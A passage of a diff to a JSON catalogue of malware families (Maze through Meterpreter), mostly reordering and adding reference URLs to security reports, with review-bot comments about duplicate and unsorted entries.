- "https://www.zataz.com/cyber-attaque-a-lencontre-des-serveurs-de-bouygues-construction/",
- "https://www.crowdstrike.com/blog/maze-ransomware-deobfuscation/",
- "https://intel471.com/blog/conti-ransomware-cooperation-maze-lockbit-ragnar-locker",
- "https://news.sophos.com/en-us/2020/12/08/egregor-ransomware-mazes-heir-apparent/",
- "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/",
- "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
- "https://ke-la.com/how-ransomware-gangs-find-new-monetization-schemes-and-evolve-in-marketing/",
- "https://www.crowdstrike.com/blog/ransomware-preparedness-a-call-to-action/",
- "https://www.cert.ssi.gouv.fr/cti/CERTFR-2021-CTI-007/",
"https://www.bleepingcomputer.com/news/security/ransomware-attackers-use-your-cloud-backups-against-you/",
- "https://www.proofpoint.com/us/threat-insight/post/ta2101-plays-government-imposter-distribute-malware-german-italian-and-us",
- "https://nakedsecurity.sophos.com/2020/06/04/nuclear-missile-contractor-hacked-in-maze-ransomware-attack/"
+ "https://nakedsecurity.sophos.com/2020/06/04/nuclear-missile-contractor-hacked-in-maze-ransomware-attack/",
+ "https://news.sophos.com/en-us/2020/12/08/egregor-ransomware-mazes-heir-apparent/",
+ "https://research.checkpoint.com/2023/following-the-scent-of-trickgate-6-year-old-packer-used-to-deploy-the-most-wanted-malware/",
+ "https://www.accenture.com/us-en/blogs/cyber-defense/evolving-danger-ransomware-extortion",
+ "https://www.telsy.com/wp-content/uploads/Maze_Vaccine.pdf",
+ "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1",
+ "https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-ransomware-threat-report-2021.pdf",
+ "https://www.bleepingcomputer.com/news/security/allied-universal-breached-by-maze-ransomware-stolen-data-leaked/",
+ "https://media-exp1.licdn.com/dms/document/C4E1FAQHyhJYCWxq5eg/feedshare-document-pdf-analyzed/0?e=1584129600&v=beta&t=9wTDR-mZPDF4ET7ABNgE2ab9g8e9wxQrhXsxI1cSX8U",
+ "https://www.trendmicro.com/en_us/research/20/l/the-impact-of-modern-ransomware-on-manufacturing-networks.html",
+ "https://news.sophos.com/en-us/2020/09/22/mtr-casebook-blocking-a-15-million-maze-ransomware-attack/",
+ "https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/543/original/CTIR_casestudy_1.pdf",
+ "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
+ "https://therecord.media/ransomwhere-project-wants-to-create-a-database-of-past-ransomware-payments/",
+ "https://www.bleepingcomputer.com/news/security/crytek-confirms-egregor-ransomware-attack-customer-data-theft/",
+ "https://oag.ca.gov/system/files/Letter%204.pdf"
],
"synonyms": [
"ChaCha"
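Review bot: almost the whole Maze refs list is deleted and re-added in a different order, so the few genuinely new references are buried under well over a hundred changed lines; emitting refs in a deterministic (sorted) order from the generator would make such updates reviewable. The re-added list also needs deduplication: `https://github.com/albertzsigovits/malware-notes/blob/master/Ransomware/Maze.md` and `https://github.com/albertzsigovits/malware-notes/blob/master/Maze.md` point at the same note, `http://www.secureworks.com/research/threat-profiles/gold-village` is kept next to its `https://` form, and the CrowdStrike double-trouble part-1 post is listed both with and without a trailing slash.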
@@ -31310,9 +33020,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.mbrlock",
- "http://id-ransomware.blogspot.com.tr/2018/02/mbrlock-hax-ransomware.html",
"https://app.any.run/tasks/0a7e643f-7562-4575-b8a5-747bd6b5f02d",
"https://www.bleepingcomputer.com/news/security/dexcrypt-mbrlocker-demands-30-yuan-to-gain-access-to-computer/",
+ "http://id-ransomware.blogspot.com.tr/2018/02/mbrlock-hax-ransomware.html",
"https://www.hybrid-analysis.com/sample/dfc56a704b5e031f3b0d2d0ea1d06f9157758ad950483b44ac4b77d33293cb38?environmentId=100"
],
"synonyms": [
@@ -31341,10 +33051,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.mebromi",
- "https://www.symantec.com/connect/blogs/bios-threat-showing-again",
"https://www.webroot.com//blog/2011/09/13/mebromi-the-first-bios-rootkit-in-the-wild/",
"http://www.theregister.co.uk/2011/09/14/bios_rootkit_discovered/",
- "http://contagiodump.blogspot.com/2011/09/mebromi-bios-rootkit-affecting-award.html"
+ "http://contagiodump.blogspot.com/2011/09/mebromi-bios-rootkit-affecting-award.html",
+ "https://www.symantec.com/connect/blogs/bios-threat-showing-again"
],
"synonyms": [
"MyBios"
@@ -31359,6 +33069,7 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.mechanical",
+ "https://us-cert.cisa.gov/ncas/alerts/aa20-301a",
"https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
"https://asert.arbornetworks.com/stolen-pencil-campaign-targets-academia/"
],
@@ -31388,8 +33099,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.medusa",
- "https://zerophagemalware.com/2017/10/13/rig-ek-via-malvertising-drops-a-miner/",
"https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf",
+ "https://zerophagemalware.com/2017/10/13/rig-ek-via-malvertising-drops-a-miner/",
"https://www.arbornetworks.com/blog/asert/medusahttp-ddos-slithers-back-spotlight/",
"https://news.drweb.com/show/?i=10302&lng=en"
],
@@ -31404,30 +33115,34 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.medusalocker",
- "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-2/",
- "https://www.cybereason.com/blog/medusalocker-ransomware",
- "https://www.theta.co.nz/news-blogs/cyber-security-blog/part-1-analysing-medusalocker-ransomware/",
- "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1",
- "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf",
- "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/wp-spark-state-of-ransomware.pdf",
- "https://www.carbonblack.com/2020/06/03/tau-threat-analyis-medusa-locker-ransomware/",
- "https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145",
"https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3",
- "https://us-cert.cisa.gov/ncas/alerts/aa20-345a",
"https://www.theta.co.nz/news-blogs/cyber-security-blog/part-3-analysing-medusalocker-ransomware/",
"https://dissectingmalwa.re/try-not-to-stare-medusalocker-at-a-glance.html",
- "http://id-ransomware.blogspot.com/2019/10/medusalocker-ransomware.html",
- "https://www.cisa.gov/uscert/ncas/alerts/aa22-181a",
- "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-181A_stopransomware_medusalocker.pdf",
- "https://blog.talosintelligence.com/2020/04/medusalocker.html",
- "https://id-ransomware.blogspot.com/2020/01/ako-ransomware.html",
- "https://twitter.com/siri_urz/status/1215194488714346496?s=20",
- "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/",
- "https://www.mandiant.com/resources/chasing-avaddon-ransomware",
"https://ke-la.com/how-ransomware-gangs-find-new-monetization-schemes-and-evolve-in-marketing/",
+ "https://www.carbonblack.com/2020/06/03/tau-threat-analyis-medusa-locker-ransomware/",
+ "http://id-ransomware.blogspot.com/2019/10/medusalocker-ransomware.html",
+ "https://www.theta.co.nz/news-blogs/cyber-security-blog/part-2-analysing-medusalocker-ransomware/",
+ "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/wp-spark-state-of-ransomware.pdf",
+ "https://blog.cyble.com/2023/03/15/unmasking-medusalocker-ransomware/",
+ "https://asec.ahnlab.com/en/48940/",
+ "https://www.cisa.gov/uscert/ncas/alerts/aa22-181a",
+ "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-2/",
+ "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1",
+ "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-181A_stopransomware_medusalocker.pdf",
+ "https://www.mandiant.com/resources/chasing-avaddon-ransomware",
+ "https://blog.talosintelligence.com/2020/04/medusalocker.html",
+ "https://us-cert.cisa.gov/ncas/alerts/aa20-345a",
+ "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf",
+ "https://id-ransomware.blogspot.com/2020/01/ako-ransomware.html",
+ "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/",
+ "https://www.cybereason.com/blog/medusalocker-ransomware",
"https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
"https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/",
- "https://www.theta.co.nz/news-blogs/cyber-security-blog/part-2-analysing-medusalocker-ransomware/"
+ "https://www.theta.co.nz/news-blogs/cyber-security-blog/part-1-analysing-medusalocker-ransomware/",
+ "https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145",
+ "https://www.bleepingcomputer.com/news/security/march-2023-broke-ransomware-attack-records-with-459-incidents/",
+ "https://cloudsek.com/technical-analysis-of-medusalocker-ransomware/",
+ "https://twitter.com/siri_urz/status/1215194488714346496?s=20"
],
"synonyms": [
"AKO Doxware",
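Review bot: the MedusaLocker refs re-added here still contain `https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1` and the same URL with a trailing slash as two separate entries; normalize URLs before emitting the list so the same reference is not counted twice, and, as in the Maze hunk above, a stable ordering would reduce this hunk to the four references that are actually new (Cyble, AhnLab, BleepingComputer, CloudSEK).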
@@ -31444,26 +33159,27 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.megacortex",
- "https://www.bleepingcomputer.com/news/security/elusive-megacortex-ransomware-found-here-is-what-we-know/",
- "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/",
- "https://news.sophos.com/en-us/2019/05/10/megacortex-deconstructed-mysteries-mount-as-analysis-continues/",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf",
"https://www.computing.co.uk/ctg/news/3084818/warning-over-lockergoga-and-megacortex-ransomware-attacks-targeting-private-industry-in-western-countries",
- "https://www.europol.europa.eu/newsroom/news/12-targeted-for-involvement-in-ransomware-attacks-against-critical-infrastructure",
- "https://news.sophos.com/en-us/2019/05/03/megacortex-ransomware-wants-to-be-the-one/",
- "https://blog.malwarebytes.com/detections/ransom-megacortex/",
- "https://www.bleepingcomputer.com/news/security/fbi-issues-alert-for-lockergoga-and-megacortex-ransomware/",
- "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware",
+ "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/csi-evidence-indicators-for-targeted-ransomware-attacks-part-ii/",
"https://www.mandiant.com/resources/financially-motivated-actors-are-expanding-access-into-ot",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf",
+ "https://www.bleepingcomputer.com/news/security/new-megacortex-ransomware-changes-windows-passwords-threatens-to-publish-data/",
+ "https://news.sophos.com/en-us/2019/05/10/megacortex-deconstructed-mysteries-mount-as-analysis-continues/",
+ "https://news.sophos.com/en-us/2019/05/03/megacortex-ransomware-wants-to-be-the-one/",
"https://threatpost.com/megacortex-ransomware-mass-distribution/146933/",
+ "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf",
"https://www.fireeye.com/blog/threat-research/2020/07/financially-motivated-actors-are-expanding-access-into-ot.html",
"https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/incident-response-polar-ransomware-apt27/",
- "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/csi-evidence-indicators-for-targeted-ransomware-attacks-part-ii/",
- "https://www.bleepingcomputer.com/news/security/new-megacortex-ransomware-changes-windows-passwords-threatens-to-publish-data/",
+ "https://www.europol.europa.eu/newsroom/news/12-targeted-for-involvement-in-ransomware-attacks-against-critical-infrastructure",
+ "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/",
+ "https://www.trendmicro.com/vinfo/pl/security/news/cybercrime-and-digital-threats/megacortex-ransomware-spotted-attacking-enterprise-networks",
"https://www.npu.gov.ua/news/kiberzlochini/kiberpolicziya-vikrila-transnaczionalne-zlochinne-ugrupovannya-u-nanesenni-inozemnim-kompaniyam-120-miljoniv-dolariv-zbitkiv/",
"https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/",
- "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf",
- "https://www.trendmicro.com/vinfo/pl/security/news/cybercrime-and-digital-threats/megacortex-ransomware-spotted-attacking-enterprise-networks"
+ "https://www.bleepingcomputer.com/news/security/elusive-megacortex-ransomware-found-here-is-what-we-know/",
+ "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware",
+ "https://blog.malwarebytes.com/detections/ransom-megacortex/",
+ "https://www.bleepingcomputer.com/news/security/bitdefender-releases-free-megacortex-ransomware-decryptor/",
+ "https://www.bleepingcomputer.com/news/security/fbi-issues-alert-for-lockergoga-and-megacortex-ransomware/"
],
"synonyms": [],
"type": []
@@ -31471,6 +33187,20 @@
"uuid": "3f09884e-dddc-4513-8720-a28fe21ab9a8",
"value": "MegaCortex"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.megacreep",
+ "https://www.bleepingcomputer.com/news/security/hacking-group-polonium-uses-creepy-malware-against-israel/",
+ "https://www.welivesecurity.com/2022/10/11/polonium-targets-israel-creepy-malware/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "394ddd91-b673-4607-b253-fe19b98008b5",
+ "value": "MegaCreep"
+ },
{
"description": "Megumin Trojan, is a malware focused on multiple fields (DDoS, Miner, Loader, Clipper).",
"meta": {
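Review bot: the new MegaCreep cluster is added with an empty `"description": ""`, unlike the neighbouring Megumin entry, which carries a one-line summary; since the hunk already links the ESET and BleepingComputer write-ups on this malware, a short description derived from those references should be filled in rather than shipping an empty string.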
@@ -31490,15 +33220,15 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.mekotio",
- "https://threatresearch.ext.hp.com/wp-content/uploads/2022/05/HP-Wolf-Security-Threat-Insights-Report-Q1-2022.pdf",
- "http://www.interior.gob.es/prensa/noticias/-/asset_publisher/GHU8Ap6ztgsg/content/id/13552853",
- "https://www.welivesecurity.com/2020/08/13/mekotio-these-arent-the-security-updates-youre-looking-for/",
- "https://www.advintel.io/post/economic-growth-digital-inclusion-specialized-crime-financial-cyber-fraud-in-latam",
- "https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/rooty-dolphin-uses-mekotio-to-target-bank-clients-in-south-america-and-europe/",
- "https://research.checkpoint.com/2021/mekotio-banker-returns-with-improved-stealth-and-ancient-encryption/",
- "https://therecord.media/spain-arrests-16-for-distributing-the-mekotio-and-grandoreiro-banking-trojans/",
"https://twitter.com/hpsecurity/status/1509185858146082816",
- "https://www.microsoft.com/security/blog/2021/11/11/html-smuggling-surges-highly-evasive-loader-technique-increasingly-used-in-banking-malware-targeted-attacks/"
+ "https://threatresearch.ext.hp.com/wp-content/uploads/2022/05/HP-Wolf-Security-Threat-Insights-Report-Q1-2022.pdf",
+ "https://www.microsoft.com/security/blog/2021/11/11/html-smuggling-surges-highly-evasive-loader-technique-increasingly-used-in-banking-malware-targeted-attacks/",
+ "https://research.checkpoint.com/2021/mekotio-banker-returns-with-improved-stealth-and-ancient-encryption/",
+ "https://www.welivesecurity.com/2020/08/13/mekotio-these-arent-the-security-updates-youre-looking-for/",
+ "https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/rooty-dolphin-uses-mekotio-to-target-bank-clients-in-south-america-and-europe/",
+ "https://www.advintel.io/post/economic-growth-digital-inclusion-specialized-crime-financial-cyber-fraud-in-latam",
+ "http://www.interior.gob.es/prensa/noticias/-/asset_publisher/GHU8Ap6ztgsg/content/id/13552853",
+ "https://therecord.media/spain-arrests-16-for-distributing-the-mekotio-and-grandoreiro-banking-trojans/"
],
"synonyms": [],
"type": []
@@ -31537,8 +33267,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.mercurialgrabber",
- "https://github.com/NightfallGT/Mercurial-Grabber",
- "https://twitter.com/Arkbird_SOLG/status/1432127748001128459"
+ "https://twitter.com/Arkbird_SOLG/status/1432127748001128459",
+ "https://github.com/NightfallGT/Mercurial-Grabber"
],
"synonyms": [],
"type": []
@@ -31551,9 +33281,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.merlin",
- "http://lockboxx.blogspot.com/2018/02/merlin-for-red-teams.html",
+ "https://michaelkoczwara.medium.com/hunting-c2-with-shodan-223ca250d06f",
+ "http://lockboxx.blogspot.com/2018/02/intro-to-using-gscript-for-red-teams.html",
"https://github.com/Ne0nd0g/merlin",
- "http://lockboxx.blogspot.com/2018/02/intro-to-using-gscript-for-red-teams.html"
+ "http://lockboxx.blogspot.com/2018/02/merlin-for-red-teams.html"
],
"synonyms": [],
"type": []
@@ -31566,37 +33297,37 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.mespinoza",
- "https://www.bleepingcomputer.com/news/security/ransomware-gangs-script-shows-exactly-the-files-theyre-after/",
- "https://www.splunk.com/en_us/blog/security/gone-in-52-seconds-and-42-minutes-a-comparative-analysis-of-ransomware-encryption-speed.html",
- "https://www.prodaft.com/resource/detail/pysa-ransomware-group-depth-analysis",
- "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/",
- "https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/",
- "https://securelist.com/modern-ransomware-groups-ttps/106824/",
- "https://www.symantec.broadcom.com/hubfs/SED/SED_Threat_Hunter_Reports_Alerts/SED_FY22Q2_SES_Ransomware-Threat-Landscape_WP.pdf",
- "https://vulnerability.ch/2021/04/ransomware-and-date-leak-site-publication-time-analysis/",
- "https://www.prodaft.com/m/reports/PYSA_TLPWHITE_3.0.pdf",
"https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3",
- "https://blogs.blackberry.com/en/2021/06/pysa-loves-chachi-a-new-golang-rat",
- "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/06/23093553/Common-TTPs-of-the-modern-ransomware_low-res.pdf",
- "https://www.splunk.com/en_us/pdfs/resources/whitepaper/an-empirically-comparative-analysis-of-ransomware-binaries.pdf",
- "https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/",
- "https://unit42.paloaltonetworks.com/gasket-and-magicsocks-tools-install-mespinoza-ransomware/",
- "https://thedfirreport.com/2020/11/23/pysa-mespinoza-ransomware/",
- "https://www.cert.ssi.gouv.fr/cti/CERTFR-2020-CTI-002/",
- "https://blog.cyble.com/2021/11/29/pysa-ransomware-under-the-lens-a-deep-dive-analysis/",
- "https://www.hhs.gov/sites/default/files/mespinoza-goldburlap-cyborgspider-analystnote-tlpwhite.pdf",
- "https://dissectingmalwa.re/another-one-for-the-collection-mespinoza-pysa-ransomware.html",
+ "https://www.prodaft.com/m/reports/PYSA_TLPWHITE_3.0.pdf",
"http://www.secureworks.com/research/threat-profiles/gold-burlap",
- "https://www.ic3.gov/Media/News/2021/210316.pdf",
- "https://twitter.com/campuscodi/status/1347223969984897026",
- "https://twitter.com/inversecos/status/1456486725664993287",
- "https://www.sentinelone.com/blog/from-the-front-lines-peering-into-a-pysa-ransomware-attack/",
"https://ke-la.com/how-ransomware-gangs-find-new-monetization-schemes-and-evolve-in-marketing/",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
- "https://id-ransomware.blogspot.com/2019/10/mespinoza-ransomware.html",
- "https://www.cybereason.com/blog/threat-analysis-report-inside-the-destructive-pysa-ransomware",
+ "https://thedfirreport.com/2020/11/23/pysa-mespinoza-ransomware/",
+ "https://www.splunk.com/en_us/pdfs/resources/whitepaper/an-empirically-comparative-analysis-of-ransomware-binaries.pdf",
+ "https://twitter.com/inversecos/status/1456486725664993287",
+ "https://www.ic3.gov/Media/News/2021/210316.pdf",
+ "https://dissectingmalwa.re/another-one-for-the-collection-mespinoza-pysa-ransomware.html",
"https://www.lacework.com/blog/pysa-ransomware-gang-adds-linux-support/",
- "https://www.zdnet.com/article/france-warns-of-new-ransomware-gang-targeting-local-governments/"
+ "https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/",
+ "https://twitter.com/campuscodi/status/1347223969984897026",
+ "https://blog.cyble.com/2021/11/29/pysa-ransomware-under-the-lens-a-deep-dive-analysis/",
+ "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/",
+ "https://www.sentinelone.com/blog/from-the-front-lines-peering-into-a-pysa-ransomware-attack/",
+ "https://blogs.blackberry.com/en/2021/06/pysa-loves-chachi-a-new-golang-rat",
+ "https://www.bleepingcomputer.com/news/security/ransomware-gangs-script-shows-exactly-the-files-theyre-after/",
+ "https://www.cybereason.com/blog/threat-analysis-report-inside-the-destructive-pysa-ransomware",
+ "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/06/23093553/Common-TTPs-of-the-modern-ransomware_low-res.pdf",
+ "https://vulnerability.ch/2021/04/ransomware-and-date-leak-site-publication-time-analysis/",
+ "https://www.splunk.com/en_us/blog/security/gone-in-52-seconds-and-42-minutes-a-comparative-analysis-of-ransomware-encryption-speed.html",
+ "https://www.symantec.broadcom.com/hubfs/SED/SED_Threat_Hunter_Reports_Alerts/SED_FY22Q2_SES_Ransomware-Threat-Landscape_WP.pdf",
+ "https://www.prodaft.com/resource/detail/pysa-ransomware-group-depth-analysis",
+ "https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/",
+ "https://id-ransomware.blogspot.com/2019/10/mespinoza-ransomware.html",
+ "https://securelist.com/modern-ransomware-groups-ttps/106824/",
+ "https://www.cert.ssi.gouv.fr/cti/CERTFR-2020-CTI-002/",
+ "https://www.zdnet.com/article/france-warns-of-new-ransomware-gang-targeting-local-governments/",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
+ "https://www.hhs.gov/sites/default/files/mespinoza-goldburlap-cyborgspider-analystnote-tlpwhite.pdf",
+ "https://unit42.paloaltonetworks.com/gasket-and-magicsocks-tools-install-mespinoza-ransomware/"
],
"synonyms": [
"pysa"
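Review bot: the removed zdnet.com "france-warns-of-new-ransomware-gang" URL at the top of this hunk is re-added unchanged further down, so that pair is pure reordering rather than a content change; only the other `+` lines (cyborgsecurity, cyble, intel471, sentinelone, and so on) are genuinely new refs. Emitting the refs array in a stable order (for example sorted) would keep the diff limited to real additions and make it easier to verify that no ref was accidentally dropped.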
@@ -31626,15 +33357,15 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.metaljack",
- "https://www.youtube.com/watch?v=ftjDH65kw6E",
- "https://s.tencent.com/research/report/944.html",
- "https://m.threatbook.cn/detail/2527",
- "https://blog.viettelcybersecurity.com/apt32-deobfuscation-arsenal-deobfuscating-mot-vai-loai-obfucation-toolkit-cua-apt32-phan-1/",
- "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
"https://go.recordedfuture.com/hubfs/reports/cta-2020-1110.pdf",
- "https://www.secrss.com/articles/17900",
+ "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
+ "https://www.fireeye.com/blog/threat-research/2020/04/apt32-targeting-chinese-government-in-covid-19-related-espionage.html",
"https://ti.qianxin.com/blog/articles/coronavirus-analysis-of-global-outbreak-related-cyber-attacks/",
- "https://www.fireeye.com/blog/threat-research/2020/04/apt32-targeting-chinese-government-in-covid-19-related-espionage.html"
+ "https://www.secrss.com/articles/17900",
+ "https://www.youtube.com/watch?v=ftjDH65kw6E",
+ "https://blog.viettelcybersecurity.com/apt32-deobfuscation-arsenal-deobfuscating-mot-vai-loai-obfucation-toolkit-cua-apt32-phan-1/",
+ "https://m.threatbook.cn/detail/2527",
+ "https://s.tencent.com/research/report/944.html"
],
"synonyms": [
"denesRAT"
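Review bot: this hunk has no net change: the seven removed URLs (youtube, tencent, threatbook, viettelcybersecurity, pwc, secrss, fireeye) all reappear as additions in a different order. A no-op reorder like this should either be dropped from the change or the generator should write refs in a deterministic order so regeneration does not produce churn that hides real edits elsewhere in the file.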
@@ -31649,17 +33380,17 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.metamorfo",
- "https://medium.com/@chenerlich/the-avast-abuser-metamorfo-banking-malware-hides-by-abusing-avast-executable-ac9b8b392767",
"https://blog.talosintelligence.com/2018/11/metamorfo-brazilian-campaigns.html",
- "https://www.botconf.eu/wp-content/uploads/2019/12/B2019-Soucek-Hornak-DemystifyingBankingTrojansFromLatinAmerica.pdf",
- "https://cofense.com/blog/autohotkey-banking-trojan/",
- "https://www.fireeye.com/blog/threat-research/2018/04/metamorfo-campaign-targeting-brazilian-users.html",
- "https://blog.ensilo.com/metamorfo-avast-abuser",
"https://umbrella.cisco.com/blog/navigating-cybersecurity-during-a-pandemic-latest-malware-and-threat-actors",
- "https://www.advintel.io/post/economic-growth-digital-inclusion-specialized-crime-financial-cyber-fraud-in-latam",
- "https://github.com/jeFF0Falltrades/IoCs/blob/master/Broadbased/metamorfo.md",
+ "https://twitter.com/MsftSecIntel/status/1418706916922986504",
"https://www.bitdefender.com/files/News/CaseStudies/study/333/Bitdefender-PR-Whitepaper-Metamorfo-creat4500-en-EN-GenericUse.pdf",
- "https://twitter.com/MsftSecIntel/status/1418706916922986504"
+ "https://github.com/jeFF0Falltrades/IoCs/blob/master/Broadbased/metamorfo.md",
+ "https://blog.ensilo.com/metamorfo-avast-abuser",
+ "https://cofense.com/blog/autohotkey-banking-trojan/",
+ "https://medium.com/@chenerlich/the-avast-abuser-metamorfo-banking-malware-hides-by-abusing-avast-executable-ac9b8b392767",
+ "https://www.advintel.io/post/economic-growth-digital-inclusion-specialized-crime-financial-cyber-fraud-in-latam",
+ "https://www.botconf.eu/wp-content/uploads/2019/12/B2019-Soucek-Hornak-DemystifyingBankingTrojansFromLatinAmerica.pdf",
+ "https://www.fireeye.com/blog/threat-research/2018/04/metamorfo-campaign-targeting-brazilian-users.html"
],
"synonyms": [
"Casbaneiro"
@@ -31670,13 +33401,16 @@
"value": "Metamorfo"
},
{
- "description": "",
+ "description": "On March 7, 2022, KELA observed a threat actor named _META_ announcing the launch of META – a new information-stealing malware, available for sale for USD125 per month or USD1000 for unlimited use. The actor claimed it has the same functionality, code, and panel as the Redline stealer, but with several improvements.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.metastealer",
+ "https://isc.sans.edu/forums/diary/Windows+MetaStealer+Malware/28522/",
+ "https://www.accenture.com/us-en/blogs/security/information-stealer-malware-on-dark-web",
"https://ke-la.com/information-stealers-a-new-landscape/",
"https://blog.sekoia.io/traffers-a-deep-dive-into-the-information-stealer-ecosystem",
- "https://isc.sans.edu/forums/diary/Windows+MetaStealer+Malware/28522/"
+ "https://research.nccgroup.com/2022/05/20/metastealer-filling-the-racoon-void/",
+ "https://medium.com/walmartglobaltech/metastealer-string-decryption-and-dga-overview-5f38f76830cd"
],
"synonyms": [],
"type": []
@@ -31689,11 +33423,12 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.meteor",
- "https://research.checkpoint.com/2021/indra-hackers-behind-recent-attacks-on-iran/",
- "https://threatpost.com/novel-meteor-wiper-used-in-attack-that-crippled-iranian-train-system/168262/",
- "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-1/",
+ "https://labs.sentinelone.com/meteorexpress-mysterious-wiper-paralyzes-iranian-trains-with-epic-troll/",
"https://twitter.com/_cpresearch_/status/1541753913732366338",
- "https://labs.sentinelone.com/meteorexpress-mysterious-wiper-paralyzes-iranian-trains-with-epic-troll/"
+ "https://research.checkpoint.com/2021/indra-hackers-behind-recent-attacks-on-iran/",
+ "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-3/",
+ "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-1/",
+ "https://threatpost.com/novel-meteor-wiper-used-in-attack-that-crippled-iranian-train-system/168262/"
],
"synonyms": [],
"type": []
@@ -31706,36 +33441,43 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.meterpreter",
- "https://securityintelligence.com/posts/trickbot-group-systematically-attacking-ukraine",
- "https://explore.group-ib.com/htct/hi-tech_crime_2018",
- "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/how-cybercriminals-abuse-cloud-tunneling-services",
- "https://redcanary.com/blog/getsystem-offsec/",
- "https://www.fintechsecurity.com.hk/slides/01.Dmitry-Annual-Group-IB-report-High-Tech-Crime-Trends.pdf",
